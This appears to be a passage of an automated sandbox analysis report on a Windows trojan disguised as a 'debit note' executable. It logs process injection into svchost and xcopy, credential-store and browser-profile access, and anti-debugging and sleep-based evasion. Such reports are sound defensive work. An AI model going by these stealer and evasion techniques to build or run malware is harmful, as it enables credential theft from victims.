                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeCode function: 7_2_0564F25F7_2_0564F25F
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_000002B4556164538_2_000002B455616453
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_000002B4556158B88_2_000002B4556158B8
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_000002B4556163358_2_000002B455616335
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_000002B455614B438_2_000002B455614B43
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_000002B45561D4048_2_000002B45561D404
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_000002B4556167EE8_2_000002B4556167EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 36 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 250 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 93 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 0360EA12 appears 86 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 0358B970 appears 250 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 035D5130 appears 36 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 0361F290 appears 103 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 035E7E54 appears 93 times
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@14/12
                Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeFile created: C:\Users\user\AppData\Local\Temp\overroughlyJump to behavior
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: xcopy.exe, 00000006.00000003.2245386042.0000000003026000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2246331837.0000000003046000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4095507452.0000000003046000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeReversingLabs: Detection: 60%
                Source: unknownProcess created: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe "C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe"
                Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe"
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe"Jump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeStatic file information: File size 1627136 > 1048576
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: xcopy.pdbUGP source: svchost.exe, 00000001.00000003.2026657859.0000000003013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2026718174.000000000302B000.00000004.00000020.00020000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000005.00000002.4095627699.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PMZSowQBcVJqD.exe, 00000005.00000000.1982139512.0000000000CDE000.00000002.00000001.01000000.00000005.sdmp, PMZSowQBcVJqD.exe, 00000007.00000000.2133989943.0000000000CDE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2058786262.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1966811502.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1968342442.0000000003400000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2069920922.000000000320E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4097829136.0000000003560000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4097829136.00000000036FE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2071661986.00000000033B7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2058786262.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1966811502.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1968342442.0000000003400000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, xcopy.exe, 00000006.00000003.2069920922.000000000320E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4097829136.0000000003560000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4097829136.00000000036FE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2071661986.00000000033B7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: xcopy.pdb source: svchost.exe, 00000001.00000003.2026657859.0000000003013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2026718174.000000000302B000.00000004.00000020.00020000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000005.00000002.4095627699.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: xcopy.exe, 00000006.00000002.4095507452.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4098892628.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.00000000031FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2360502532.000000001584C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: xcopy.exe, 00000006.00000002.4095507452.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4098892628.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.00000000031FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2360502532.000000001584C000.00000004.80000000.00040000.00000000.sdmp
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418099 push ds; retf 1_2_0041809D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00405146 push 77A95BDBh; iretd 1_2_0040514B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D2DD push esp; retf 1_2_0040D301
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418B58 pushfd ; iretd 1_2_00418B63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403320 push eax; ret 1_2_00403322
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00404C21 push ds; iretd 1_2_00404C3C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00424DA3 push ss; ret 1_2_00424DC5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E686 push cs; iretd 1_2_0041E68D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414740 push esp; ret 1_2_00414773
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D76C push 71D13F2Ch; iretd 1_2_0040D775
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401771 push AEE129C4h; iretd 1_2_00401776
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402FD4 push ss; retf 1_2_00402FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040BFE1 pushfd ; retf 1_2_0040BFE2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD push ecx; mov dword ptr [esp], ecx1_2_036309B6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035909AD push ecx; mov dword ptr [esp], ecx6_2_035909B6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A401B5 push ds; iretd 6_2_00A401B6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A3B363 push cs; iretd 6_2_00A3B36A
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A31420 push esp; ret 6_2_00A31450
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A218FE push ds; iretd 6_2_00A21919
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A35835 pushfd ; iretd 6_2_00A35840
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A41A80 push ss; ret 6_2_00A41AA2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A39A70 push esp; retf 29BFh6_2_00A39B95
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A3BBB3 push ss; iretd 6_2_00A3BBBF
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A28CBE pushfd ; retf 6_2_00A28CBF
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A34D76 push ds; retf 6_2_00A34D7A
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A21E23 push 77A95BDBh; iretd 6_2_00A21E28
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03365242 push eax; ret 6_2_03365244
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03355156 push ecx; iretd 6_2_0335515E
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_033560E9 push ebx; retf 6_2_033560ED
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_033559CA push FFFFFFC1h; iretd 6_2_033559CC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03355E38 push esp; retf 6_2_03355E39
                Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeAPI/Special instruction interceptor: Address: 3D4025C
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD1C0 rdtsc 1_2_036AD1C0
                Source: C:\Windows\SysWOW64\xcopy.exeWindow / User API: threadDelayed 1795Jump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeWindow / User API: threadDelayed 8179Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\xcopy.exeAPI coverage: 3.1 %
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 1136Thread sleep count: 1795 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 1136Thread sleep time: -3590000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 1136Thread sleep count: 8179 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 1136Thread sleep time: -16358000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe TID: 2260Thread sleep time: -70000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe TID: 2260Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe TID: 2260Thread sleep time: -54000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe TID: 2260Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe TID: 2260Thread sleep time: -34000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\xcopy.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A3C330 FindFirstFileW,FindNextFileW,FindClose,6_2_00A3C330
                Source: xcopy.exe, 00000006.00000002.4095507452.0000000002FC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
                Source: PMZSowQBcVJqD.exe, 00000007.00000002.4096103511.000000000135F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2362063996.000002B45583C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD1C0 rdtsc 1_2_036AD1C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417643 LdrLoadDll,1_2_00417643
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF367 mov eax, dword ptr fs:[00000030h]1_2_036EF367
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D437C mov eax, dword ptr fs:[00000030h]1_2_036D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03637370 mov eax, dword ptr fs:[00000030h]1_2_03637370
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03637370 mov eax, dword ptr fs:[00000030h]1_2_03637370
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03637370 mov eax, dword ptr fs:[00000030h]1_2_03637370
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362D34C mov eax, dword ptr fs:[00000030h]1_2_0362D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362D34C mov eax, dword ptr fs:[00000030h]1_2_0362D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03705341 mov eax, dword ptr fs:[00000030h]1_2_03705341
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629353 mov eax, dword ptr fs:[00000030h]1_2_03629353
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629353 mov eax, dword ptr fs:[00000030h]1_2_03629353
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov ecx, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA352 mov eax, dword ptr fs:[00000030h]1_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F132D mov eax, dword ptr fs:[00000030h]1_2_036F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F132D mov eax, dword ptr fs:[00000030h]1_2_036F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365F32A mov eax, dword ptr fs:[00000030h]1_2_0365F32A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03627330 mov eax, dword ptr fs:[00000030h]1_2_03627330
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B930B mov eax, dword ptr fs:[00000030h]1_2_036B930B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B930B mov eax, dword ptr fs:[00000030h]1_2_036B930B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B930B mov eax, dword ptr fs:[00000030h]1_2_036B930B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C310 mov ecx, dword ptr fs:[00000030h]1_2_0362C310
